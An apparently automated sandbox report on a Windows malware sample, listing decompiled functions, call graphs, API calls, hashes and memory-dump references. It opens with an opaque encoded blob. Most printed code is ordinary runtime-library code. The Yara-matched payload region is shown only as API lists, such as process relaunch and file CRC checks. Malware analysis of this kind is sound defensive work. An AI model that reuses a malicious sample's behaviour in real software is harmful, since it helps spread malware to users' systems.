og+q9CvOPIdda0waa9mGmcOVbBfwa3Dh4VGBcXwDnlOxU6oQofp2S42sK0ht5IPKl9SxidS936vEC5gWtyxy3ZcLS1ob0edt9vLl8hTfwKJV61yOTFCoVNm6jwy$zjiMmmgV+ia37/CLcqxkz0U75u1H8yecEFJkDXkY9AiQCw0baRHMEYpigHTZZJcJjExSDxKn5tBNshgzAKxw4xNZlo03Fl3WdZbc/RhfGj5VOA+crwluHxKZuUzJvXpQ11zt8VzabHXqRSPh/87HFRAq58dFxrHgPzRfSmncORhe/4kxnWzfTZ9Ip7d6wop2nsc6QdQaB7wQrbrknenqWtfoaN82YpzRD32GW4pk8jSkFnKPDE6r2ml0GtvFaD1nyGTE$zwQdNszk5V5QLZGY85hTSOqV6W5KxlRRGLPjszs+LQJJFC5lquqWlzguEz+P9BW1d9h8ussPMIFCorRlMZ/4hfYrVu+0cakv/rzzjfrUoTXYLUB8SIKAy1QSZ3PCf1EE0m0kPKQF6xld3ilUtn6VvQ5j0Hx7IKkvCUUcJrws46xFuGL9hThbRqArP6fmpeCc4EO21cu4ZA7oUVu7Hzko7LFrp2GKiEjJSNUdOOhs8VMAJHaMdNS4GwBCjID4lTJMP64x$~
                                                                              • API String ID: 3309707590-1387258083
                                                                              • Opcode ID: 7659dfa4048c2dd70053846793dcdc97d36c6b9409b199952d3fe3ae08ef78d9
                                                                              • Instruction ID: 31c2921b573d0aa8b791fa0ac913be43e08c1e9334c7daa0cce932c98964dfed
                                                                              • Opcode Fuzzy Hash: 7659dfa4048c2dd70053846793dcdc97d36c6b9409b199952d3fe3ae08ef78d9
                                                                              • Instruction Fuzzy Hash: 383339B6C0514CB9DB01EAE5DD95CDFBFBCAE16308F04416BB816B3192EA385B08C675
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DB8C, Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1108 42db8c-42dbab EnterCriticalSection 1109 42dbba-42dbbf 1108->1109 1110 42dbad-42dbb4 1108->1110 1111 42dbc1-42dbc4 1109->1111 1112 42dbdc-42dbe4 1109->1112 1110->1109 1113 42dc6e-42dc71 1110->1113 1116 42dbc7-42dbca 1111->1116 1117 42dbf6-42dc15 GlobalHandle GlobalUnlock GlobalReAlloc 1112->1117 1118 42dbe6-42dbf4 GlobalAlloc 1112->1118 1114 42dc73-42dc76 1113->1114 1115 42dc79-42dc97 LeaveCriticalSection 1113->1115 1114->1115 1119 42dbd4-42dbd6 1116->1119 1120 42dbcc-42dbd2 1116->1120 1121 42dc1b-42dc1d 1117->1121 1118->1121 1119->1112 1119->1113 1120->1116 1120->1119 1122 42dc42-42dc6b GlobalLock call 412140 1121->1122 1123 42dc1f-42dc24 1121->1123 1122->1113 1124 42dc26-42dc2e GlobalHandle GlobalLock 1123->1124 1125 42dc34-42dc37 LeaveCriticalSection 1123->1125 1124->1125 1125->1122
                                                                              C-Code - Quality: 83%
                                                                              			E0042DB8C(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t41;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				void* _t48;
				void* _t49;
				signed int _t70;
				signed char* _t72;
				signed int _t81;
				signed char* _t84;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_t72 = __ecx;
				_t88 = _t93;
				_push(__ecx);
				_push(__ecx);
				_t84 = __ecx;
				_t1 = _t84 + 0x1c; // 0x45a0f4
				_t41 = _t1;
				_v8 = _t41;
				EnterCriticalSection(_t41);
				_t3 = _t84 + 4; // 0x20
				_t42 =  *_t3;
				_t4 = _t84 + 8; // 0x3
				if( *_t4 >= _t42) {
					L5:
					_t81 = 1;
					if(_t42 <= 1) {
						L10:
						_t19 = _t42 + 0x20; // 0x40
						_t70 = _t19;
						_t20 = _t84 + 0x10; // 0x5a9030
						_t43 =  *_t20;
						if(_t43 != 0) {
							_t44 = GlobalHandle(_t43);
							_v12 = _t44;
							GlobalUnlock(_t44);
							_t48 = GlobalReAlloc(_v12, _t70 << 3, 0x2002);
						} else {
							_t48 = GlobalAlloc(2, _t70 << 3); // executed
						}
						if(_t48 != 0) {
							_t49 = GlobalLock(_t48);
							_t25 = _t84 + 4; // 0x20
							_v12 = _t49;
							E00412140(_t49 +  *_t25 * 8, 0, _t70 -  *_t25 << 3);
							 *(_t84 + 4) = _t70;
							 *(_t84 + 0x10) = _v12;
							goto L18;
						} else {
							_t23 = _t84 + 0x10; // 0x5a9030
							_t86 =  *_t23;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v8);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v32 = 0x458438;
							E004128BF( &_v32, 0x451a38);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v40 = 0x4584d0;
							E004128BF( &_v40, 0x451a7c);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v48 = 0x458568;
							E004128BF( &_v48, 0x451ac0);
							asm("int3");
							return 0x44b528;
						}
					} else {
						_t16 = _t84 + 0x10; // 0x5a9030
						_t72 =  *_t16 + 8;
						while(( *_t72 & 0x00000001) != 0) {
							_t81 = _t81 + 1;
							_t72 =  &(_t72[8]);
							if(_t81 < _t42) {
								continue;
							}
							break;
						}
						if(_t81 < _t42) {
							goto L18;
						} else {
							goto L10;
						}
					}
				} else {
					_t11 = __esi + 0x10; // 0x5a9030
					__ecx =  *_t11;
					if(( *( *_t11 + __edi * 8) & 0x00000001) == 0) {
						L18:
						_t32 = _t84 + 0xc; // 0x3
						if(_t81 >=  *_t32) {
							_t33 = _t81 + 1; // 0x4
							 *((intOrPtr*)(_t84 + 0xc)) = _t33;
						}
						_t35 = _t84 + 0x10; // 0x5a9030
						 *( *_t35 + _t81 * 8) =  *( *_t35 + _t81 * 8) | 0x00000001;
						_t39 = _t81 + 1; // 0x4
						 *((intOrPtr*)(_t84 + 8)) = _t39;
						LeaveCriticalSection(_v8);
						return _t81;
					} else {
						goto L5;
					}
				}
			}

























                                                                              0x0042db8c
                                                                              0x0042db8d
                                                                              0x0042db8f
                                                                              0x0042db90
                                                                              0x0042db93
                                                                              0x0042db95
                                                                              0x0042db95
                                                                              0x0042db9a
                                                                              0x0042db9d
                                                                              0x0042dba3
                                                                              0x0042dba3
                                                                              0x0042dba6
                                                                              0x0042dbab
                                                                              0x0042dbba
                                                                              0x0042dbbc
                                                                              0x0042dbbf
                                                                              0x0042dbdc
                                                                              0x0042dbdc
                                                                              0x0042dbdc
                                                                              0x0042dbdf
                                                                              0x0042dbdf
                                                                              0x0042dbe4
                                                                              0x0042dbf7
                                                                              0x0042dbfe
                                                                              0x0042dc01
                                                                              0x0042dc15
                                                                              0x0042dbe6
                                                                              0x0042dbee
                                                                              0x0042dbee
                                                                              0x0042dc1d
                                                                              0x0042dc43
                                                                              0x0042dc49
                                                                              0x0042dc54
                                                                              0x0042dc5d
                                                                              0x0042dc68
                                                                              0x0042dc6b
                                                                              0x00000000
                                                                              0x0042dc1f
                                                                              0x0042dc1f
                                                                              0x0042dc1f
                                                                              0x0042dc24
                                                                              0x0042dc2e
                                                                              0x0042dc2e
                                                                              0x0042dc37
                                                                              0x00422eaf
                                                                              0x00422eb0
                                                                              0x00422eb2
                                                                              0x00422ebc
                                                                              0x00422ec3
                                                                              0x00422ec8
                                                                              0x00422ec9
                                                                              0x00422eca
                                                                              0x00422ecc
                                                                              0x00422ed6
                                                                              0x00422edd
                                                                              0x00422ee2
                                                                              0x00422ee3
                                                                              0x00422ee6
                                                                              0x00422ef0
                                                                              0x00422ef7
                                                                              0x00422efc
                                                                              0x00422f02
                                                                              0x00422f02
                                                                              0x0042dbc1
                                                                              0x0042dbc1
                                                                              0x0042dbc4
                                                                              0x0042dbc7
                                                                              0x0042dbcc
                                                                              0x0042dbcd
                                                                              0x0042dbd2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dbd2
                                                                              0x0042dbd6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dbd6
                                                                              0x0042dbad
                                                                              0x0042dbad
                                                                              0x0042dbad
                                                                              0x0042dbb4
                                                                              0x0042dc6e
                                                                              0x0042dc6e
                                                                              0x0042dc71
                                                                              0x0042dc73
                                                                              0x0042dc76
                                                                              0x0042dc76
                                                                              0x0042dc79
                                                                              0x0042dc82
                                                                              0x0042dc85
                                                                              0x0042dc88
                                                                              0x0042dc8b
                                                                              0x0042dc97
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dbb4

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0045A0F4,74B04DE0,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0), ref: 0042DB9D
                                                                              • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0), ref: 0042DBEE
                                                                              • GlobalHandle.KERNEL32(005A9030), ref: 0042DBF7
                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0), ref: 0042DC01
                                                                              • GlobalReAlloc.KERNEL32 ref: 0042DC15
                                                                              • GlobalHandle.KERNEL32(005A9030), ref: 0042DC27
                                                                              • GlobalLock.KERNEL32 ref: 0042DC2E
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0), ref: 0042DC37
                                                                              • GlobalLock.KERNEL32 ref: 0042DC43
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0042DC8B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                              • String ID:
                                                                              • API String ID: 2667261700-0
                                                                              • Opcode ID: 55d33e081a608ed79ff8c8c6c1387b7713cef4b45d6e0938ab5c24c9294444c8
                                                                              • Instruction ID: 5151ff8eace3e0ffd6cd1ca8c0d63771c81277211bd7299c0ab29f85b6c7337c
                                                                              • Opcode Fuzzy Hash: 55d33e081a608ed79ff8c8c6c1387b7713cef4b45d6e0938ab5c24c9294444c8
                                                                              • Instruction Fuzzy Hash: 5B31AD70A00715AFCB24CF65EE48A5ABBF9FF84300B01896EE942D3260D7B4F945CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E480, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1155 42e480-42e4c9 call 42d179 GetModuleFileNameA 1158 42e4cb-42e4cd 1155->1158 1159 42e4cf call 42a382 1155->1159 1158->1159 1160 42e4d4-42e4e6 PathFindExtensionA 1158->1160 1159->1160 1162 42e4e8 call 42a382 1160->1162 1163 42e4ed-42e509 call 42e451 1160->1163 1162->1163 1167 42e510-42e515 1163->1167 1168 42e50b call 42a382 1163->1168 1170 42e527-42e52a 1167->1170 1171 42e517-42e524 call 4131c4 1167->1171 1168->1167 1173 42e555-42e55e 1170->1173 1174 42e52c-42e541 call 428c25 1170->1174 1171->1170 1176 42e560-42e564 1173->1176 1177 42e591-42e594 1173->1177 1185 42e543-42e547 1174->1185 1186 42e549 1174->1186 1180 42e566-42e56b 1176->1180 1181 42e56d 1176->1181 1182 42e596-42e5b5 lstrcatA call 4131c4 1177->1182 1183 42e5b8-42e5cd call 412fbb 1177->1183 1188 42e572-42e58e lstrcpyA call 4131c4 1180->1188 1181->1188 1182->1183 1190 42e54c-42e552 call 4131c4 1185->1190 1186->1190 1188->1177 1190->1173
                                                                              C-Code - Quality: 76%
                                                                              			E0042E480(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* __ebp;
				intOrPtr _t35;
				long _t40;
				CHAR* _t43;
				void* _t65;
				void* _t78;
				void* _t80;
				void* _t82;

				_t67 = __ecx;
				_t80 = _t82 - 0x290;
				_t35 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t80 + 0x28c)) = _t35;
				_t78 = __ecx;
				_t65 = E0042D179();
				 *(_t65 + 8) =  *(_t78 + 0x40);
				 *(_t65 + 0xc) =  *(_t78 + 0x40);
				_t40 = GetModuleFileNameA( *(_t78 + 0x40), _t80 + 0x84, 0x104);
				if(_t40 == 0 || _t40 == 0x104) {
					E0042A382(_t67);
				}
				_t43 = PathFindExtensionA(_t80 + 0x84); // executed
				 *(_t80 - 0x80) = _t43;
				if(_t43 == 0) {
					E0042A382(_t67);
				}
				 *( *(_t80 - 0x80)) = 0;
				if(E0042E451(_t80 + 0x84, _t80 + 0x188, 0x104) != 0) {
					E0042A382(_t67);
				}
				if( *((intOrPtr*)(_t78 + 0x5c)) == 0) {
					 *((intOrPtr*)(_t78 + 0x5c)) = E004131C4(_t80 + 0x188);
				}
				if( *(_t78 + 0x4c) == 0) {
					if(E00428C25(0xe000, _t80 - 0x7c, 0x100) == 0) {
						_push( *((intOrPtr*)(_t78 + 0x5c)));
					} else {
						_push(_t80 - 0x7c);
					}
					 *(_t78 + 0x4c) = E004131C4();
				}
				_t48 =  *(_t78 + 0x4c);
				 *(_t65 + 0x10) =  *(_t78 + 0x4c);
				if( *((intOrPtr*)(_t78 + 0x60)) == 0) {
					if( *((intOrPtr*)(_t78 + 0x68)) != 1) {
						_push(".HLP");
					} else {
						_push(".CHM");
					}
					lstrcpyA( *(_t80 - 0x80), ??);
					 *((intOrPtr*)(_t78 + 0x60)) = E004131C4(_t80 + 0x84);
					_t48 =  *(_t80 - 0x80);
					 *( *(_t80 - 0x80)) = 0;
				}
				if( *((intOrPtr*)(_t78 + 0x64)) == 0) {
					lstrcatA(_t80 + 0x188, ".INI");
					 *((intOrPtr*)(_t78 + 0x64)) = E004131C4(_t80 + 0x188);
				}
				return E00412FBB(_t48,  *((intOrPtr*)(_t80 + 0x28c)));
			}











                                                                              0x0042e480
                                                                              0x0042e481
                                                                              0x0042e48e
                                                                              0x0042e496
                                                                              0x0042e49c
                                                                              0x0042e4a3
                                                                              0x0042e4a8
                                                                              0x0042e4ae
                                                                              0x0042e4c1
                                                                              0x0042e4c9
                                                                              0x0042e4cf
                                                                              0x0042e4cf
                                                                              0x0042e4db
                                                                              0x0042e4e3
                                                                              0x0042e4e6
                                                                              0x0042e4e8
                                                                              0x0042e4e8
                                                                              0x0042e4f0
                                                                              0x0042e509
                                                                              0x0042e50b
                                                                              0x0042e50b
                                                                              0x0042e515
                                                                              0x0042e524
                                                                              0x0042e524
                                                                              0x0042e52a
                                                                              0x0042e541
                                                                              0x0042e549
                                                                              0x0042e543
                                                                              0x0042e546
                                                                              0x0042e546
                                                                              0x0042e552
                                                                              0x0042e552
                                                                              0x0042e555
                                                                              0x0042e558
                                                                              0x0042e55e
                                                                              0x0042e564
                                                                              0x0042e56d
                                                                              0x0042e566
                                                                              0x0042e566
                                                                              0x0042e566
                                                                              0x0042e575
                                                                              0x0042e587
                                                                              0x0042e58a
                                                                              0x0042e58e
                                                                              0x0042e58e
                                                                              0x0042e594
                                                                              0x0042e5a2
                                                                              0x0042e5b5
                                                                              0x0042e5b5
                                                                              0x0042e5cd

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042E4C1
                                                                              • PathFindExtensionA.KERNELBASE(?), ref: 0042E4DB
                                                                              • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042E575
                                                                              • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042E5A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                              • String ID: .CHM$.HLP$.INI
                                                                              • API String ID: 2140653559-4017452060
                                                                              • Opcode ID: 53a99e2f1d3c8ef1a8b7f41c32cb084a245127436117a779d48c3922d1480061
                                                                              • Instruction ID: 63ea58bfbce8c7fa5a9daef6ef929e1c48f7f43424eb3444c0f7fb182fa2d7e9
                                                                              • Opcode Fuzzy Hash: 53a99e2f1d3c8ef1a8b7f41c32cb084a245127436117a779d48c3922d1480061
                                                                              • Instruction Fuzzy Hash: E9413271600754AFDB31EFAAEC44ADA77E8BB04348F50482BF945D7241EB78D640CB25
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222DA0A, Relevance: 12.1, APIs: 8, Instructions: 63stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0222DA2F
                                                                              • _snwprintf.NTDLL ref: 0222DA5D
                                                                              • GetCommandLineW.KERNEL32 ref: 0222DA6D
                                                                              • lstrlenW.KERNEL32(00000000), ref: 0222DA76
                                                                              • lstrlenW.KERNEL32(?), ref: 0222DA85
                                                                              • lstrcmpiW.KERNELBASE(00000000,?), ref: 0222DA9A
                                                                              • ExitProcess.KERNEL32 ref: 0222DAAB
                                                                                • Part of subcall function 02221CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02221CF2
                                                                              • ExitProcess.KERNEL32 ref: 0222DAD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 4243820956-0
                                                                              • Opcode ID: 3b856cade4b270d5b7b38b177bfe24f89edfc36d80d6414bec47b26bccc18866
                                                                              • Instruction ID: 308edeb0491cf0b6cec78d06b3cfd4c44db33603fd4e76d99539f15992a72eab
                                                                              • Opcode Fuzzy Hash: 3b856cade4b270d5b7b38b177bfe24f89edfc36d80d6414bec47b26bccc18866
                                                                              • Instruction Fuzzy Hash: 6C11EE72950228ABDB20ABE09C8CFFE377DFB10744F000654FA0A93159EE305D698EA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222DD5D, Relevance: 12.1, APIs: 8, Instructions: 52fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1234 222dd5d-222dd7d CreateFileW 1235 222ddd3-222ddd5 1234->1235 1236 222dd7f-222dd91 CreateFileMappingW 1234->1236 1237 222dd93-222dda3 MapViewOfFile 1236->1237 1238 222ddcb-222ddd2 CloseHandle 1236->1238 1239 222ddc4-222ddc5 FindCloseChangeNotification 1237->1239 1240 222dda5-222ddbe GetFileSize RtlComputeCrc32 UnmapViewOfFile 1237->1240 1238->1235 1239->1238 1240->1239
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(02234330,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DD72
                                                                              • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DD87
                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DD99
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDA8
                                                                              • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0222DDB2
                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDBE
                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDC5
                                                                              • CloseHandle.KERNEL32(00000000,?,?,0222E2E9,00000102,0222BC8F,?,0222BD08), ref: 0222DDCC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateView$ChangeComputeCrc32FindHandleMappingNotificationSizeUnmap
                                                                              • String ID:
                                                                              • API String ID: 3267598783-0
                                                                              • Opcode ID: 73f57c022968daa54a6cce930ba5ed28a945c9bce318e1974765a9ef2c788954
                                                                              • Instruction ID: f13a49accf4d07fce9d290df875e44bbb29de11fddbe51c0ec05176b80967eb1
                                                                              • Opcode Fuzzy Hash: 73f57c022968daa54a6cce930ba5ed28a945c9bce318e1974765a9ef2c788954
                                                                              • Instruction Fuzzy Hash: 37014FB2A80619BFF2111BE4BDCDFBB26ACDB46B9EF100914FA05E1180DBA14C214670
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428BCB, Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              C-Code - Quality: 100%
                                                                              			E00428BCB(void* __ecx) {
				int _t5;
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t19 + 8)) = _t5;
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x45a310 = GetSystemMetrics(2) + 1;
				 *0x45a314 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}






                                                                              0x00428bd6
                                                                              0x00428bd8
                                                                              0x00428bdc
                                                                              0x00428be3
                                                                              0x00428beb
                                                                              0x00428bf5
                                                                              0x00428c06
                                                                              0x00428c10
                                                                              0x00428c18
                                                                              0x00428c24

                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL ref: 00428BD8
                                                                              • GetSystemMetrics.USER32 ref: 00428BDF
                                                                              • GetSystemMetrics.USER32 ref: 00428BE6
                                                                              • GetSystemMetrics.USER32 ref: 00428BF0
                                                                              • GetDC.USER32(00000000), ref: 00428BFA
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00428C0B
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00428C13
                                                                              • ReleaseDC.USER32 ref: 00428C1B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                              • String ID:
                                                                              • API String ID: 1031845853-0
                                                                              • Opcode ID: 0ff0594fa1ac5c0d24070ad7f7d78c5d9afa5e582a6233197286299b07487db1
                                                                              • Instruction ID: b7a61e8c6927174e9985a73cde8d92fe2022ff0e0a374240345f3f584badab39
                                                                              • Opcode Fuzzy Hash: 0ff0594fa1ac5c0d24070ad7f7d78c5d9afa5e582a6233197286299b07487db1
                                                                              • Instruction Fuzzy Hash: F0F03071A40704AEE7206F729C4DF277BA4EB81B21F11492AEB418B2D0D7F9D8058F94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E5CE, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1242 42e5ce-42e5fa SetErrorMode * 2 call 42d179 * 2 1247 42e614-42e61e call 42d179 1242->1247 1248 42e5fc-42e60f call 42e480 1242->1248 1252 42e620 call 423e66 1247->1252 1253 42e625-42e632 GetModuleHandleA 1247->1253 1248->1247 1252->1253 1255 42e634-42e640 GetProcAddress 1253->1255 1256 42e645-42e648 1253->1256 1255->1256
                                                                              C-Code - Quality: 100%
                                                                              			E0042E5CE(intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				signed int _t11;
				void* _t14;
				intOrPtr _t16;
				struct HINSTANCE__* _t18;
				void* _t24;
				void* _t28;
				intOrPtr _t31;

				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0042D179();
				_t31 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t31;
				 *((intOrPtr*)(_t14 + 0xc)) = _t31;
				_t16 =  *((intOrPtr*)(E0042D179() + 4));
				if(_t16 != 0) {
					 *((intOrPtr*)(_t16 + 0x44)) = _a12;
					 *((intOrPtr*)(_t16 + 0x48)) = _a16;
					 *((intOrPtr*)(_t16 + 0x40)) = _t31;
					E0042E480(_t24, _t16, _t28, _t31);
				}
				if( *((char*)(E0042D179() + 0x14)) == 0) {
					E00423E66();
				}
				_t18 = GetModuleHandleA("user32.dll");
				if(_t18 != 0) {
					 *0x459e34 = GetProcAddress(_t18, "NotifyWinEvent");
				}
				return 1;
			}











                                                                              0x0042e5d7
                                                                              0x0042e5df
                                                                              0x0042e5e1
                                                                              0x0042e5e6
                                                                              0x0042e5ea
                                                                              0x0042e5ed
                                                                              0x0042e5f5
                                                                              0x0042e5fa
                                                                              0x0042e600
                                                                              0x0042e607
                                                                              0x0042e60c
                                                                              0x0042e60f
                                                                              0x0042e60f
                                                                              0x0042e61e
                                                                              0x0042e620
                                                                              0x0042e620
                                                                              0x0042e62a
                                                                              0x0042e632
                                                                              0x0042e640
                                                                              0x0042e640
                                                                              0x0042e648

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00000000,00000000,0042A1DF,?,?,?,?,74B04DE0,00000000,?,00412EE2,00000000), ref: 0042E5D7
                                                                              • SetErrorMode.KERNELBASE(00000000,?,00412EE2,00000000), ref: 0042E5DF
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,00412EE2,00000000), ref: 0042E62A
                                                                              • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042E63A
                                                                                • Part of subcall function 0042E480: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042E4C1
                                                                                • Part of subcall function 0042E480: PathFindExtensionA.KERNELBASE(?), ref: 0042E4DB
                                                                                • Part of subcall function 0042E480: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042E575
                                                                                • Part of subcall function 0042E480: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042E5A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
